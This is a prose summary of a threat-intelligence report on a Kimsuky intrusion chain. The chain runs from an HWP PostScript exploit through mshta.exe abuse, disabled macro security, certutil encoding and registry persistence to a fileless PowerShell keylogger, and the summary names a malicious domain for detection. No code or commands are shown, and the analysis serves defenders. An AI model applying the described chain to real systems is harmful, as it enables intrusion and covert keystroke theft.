Igloo analyzes Operation KimsuKEE as an evolved Kimsuky intrusion chain that still begins with an HWP document exploiting PostScript execution to load shellcode. The newer sample differs from earlier Kimsuky tradecraft by abusing the legitimate mshta.exe process, chaining multiple malware distribution URLs, and delivering fileless VBA and PowerShell scripts instead of relying mainly on Win32 API-based droppers or downloaders. The infection flow disables Word and Excel macro security settings, collects system and recent-file information with shell commands, Base64-encodes the results with certutil, and establishes persistence through a registry PowerShell command. The final payload, driving.ps1, is described as a fileless PowerShell keylogger, with related distribution and upload URLs under jmable.mireene.com and several hashes provided for detection. The report matters because it shows Kimsuky adapting toward script-heavy, fileless execution while retaining HWP exploitation and keylogging behavior that defenders can monitor.